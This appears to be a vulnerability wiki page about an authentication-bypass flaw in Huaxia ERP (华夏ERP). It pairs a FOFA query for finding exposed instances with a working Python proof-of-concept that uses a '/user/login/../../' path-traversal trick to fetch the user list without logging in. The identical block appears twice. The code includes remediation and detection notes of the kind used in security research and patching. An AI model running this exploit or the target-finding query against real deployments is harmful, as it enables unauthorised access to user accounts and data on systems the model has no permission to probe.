華夏ERP授權繞過漏洞(二)

# 華夏ERP授權繞過漏洞(二)
==FOFA==

title="华夏ERP"

==POC==

import sys,requests

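def main(ip):
    """Check whether the 华夏ERP instance at *ip* returns its user list without a session.

    Sends one unauthenticated GET (no cookie or token is attached) to
    ``/user/login/../../user/getUserList``. After dot-segment resolution that
    path is ``/user/getUserList``. Presumably the authentication filter
    exempts the login path and compares against the raw, un-normalised URI;
    confirm against the filter code of the deployment under review.

    Args:
        ip: Base URL of the instance including scheme, e.g. ``http://ip:port``.

    Returns:
        None. On HTTP 200 the response body is printed so it can be inspected.
        A 200 status alone is only an indication; the finding is confirmed
        only if the body actually contains user records.

    Remediation notes: canonicalise the request path before the allowlist
    comparison, or reject paths containing ``..`` segments. In access logs
    this probe typically appears as a GET whose path contains
    ``/user/login/../``.
    """
    # "&currentPage" is spelled out literally: HTML rendering turns a bare
    # "&curren" into the "¤" sign, which corrupts the query string.
    # The encoded search value decodes to {"userName":"","loginName":""}.
    url = (
        "{ip}/user/login/../../user/getUserList"
        "?search=%7B%22userName%22%3A%22%22%2C%22loginName%22%3A%22%22%7D"
        "&currentPage=1&pageSize=15"
    ).format(ip=ip)
    try:
        # verify=False skips TLS certificate validation, so the peer is not
        # authenticated; treat the response as unverified.
        res = requests.get(url, verify=False, timeout=5)
    except requests.RequestException as err:
        # Timeouts and connection errors are reported instead of a traceback.
        print("- {ip} 请求失败: {err}".format(ip=ip, err=err), file=sys.stderr)
        return
    if res.status_code == 200:
        print("+ {ip} 访问成功\n{data}".format(ip=ip,data=res.text))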
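# Script entry point: the single argument is the base URL, e.g. http://ip:port.
if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the argument is missing.
    if len(sys.argv) != 2:
        sys.exit("usage: python3 poc.py http://ip:port")
    main(sys.argv[1])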
用法:python3 poc.py http://ip:port

==FOFA==

title="华夏ERP"

==POC==

import sys,requests

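def main(ip):
    """Check whether the 华夏ERP instance at *ip* returns its user list without a session.

    Sends one unauthenticated GET (no cookie or token is attached) to
    ``/user/login/../../user/getUserList``. After dot-segment resolution that
    path is ``/user/getUserList``. Presumably the authentication filter
    exempts the login path and compares against the raw, un-normalised URI;
    confirm against the filter code of the deployment under review.

    Args:
        ip: Base URL of the instance including scheme, e.g. ``http://ip:port``.

    Returns:
        None. On HTTP 200 the response body is printed so it can be inspected.
        A 200 status alone is only an indication; the finding is confirmed
        only if the body actually contains user records.

    Remediation notes: canonicalise the request path before the allowlist
    comparison, or reject paths containing ``..`` segments. In access logs
    this probe typically appears as a GET whose path contains
    ``/user/login/../``.
    """
    # "&currentPage" is spelled out literally: HTML rendering turns a bare
    # "&curren" into the "¤" sign, which corrupts the query string.
    # The encoded search value decodes to {"userName":"","loginName":""}.
    url = (
        "{ip}/user/login/../../user/getUserList"
        "?search=%7B%22userName%22%3A%22%22%2C%22loginName%22%3A%22%22%7D"
        "&currentPage=1&pageSize=15"
    ).format(ip=ip)
    try:
        # verify=False skips TLS certificate validation, so the peer is not
        # authenticated; treat the response as unverified.
        res = requests.get(url, verify=False, timeout=5)
    except requests.RequestException as err:
        # Timeouts and connection errors are reported instead of a traceback.
        print("- {ip} 请求失败: {err}".format(ip=ip, err=err), file=sys.stderr)
        return
    if res.status_code == 200:
        print("+ {ip} 访问成功\n{data}".format(ip=ip,data=res.text))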
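# Script entry point: the single argument is the base URL, e.g. http://ip:port.
if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the argument is missing.
    if len(sys.argv) != 2:
        sys.exit("usage: python3 poc.py http://ip:port")
    main(sys.argv[1])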
用法:python3 poc.py http://ip:port

==參考==
http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%8D%8E%E5%A4%8FERP/%E5%8D%8E%E5%A4%8FERP%E7%AC%AC%E4%BA%8C%E5%A4%84%E6%8E%88%E6%9D%83%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md
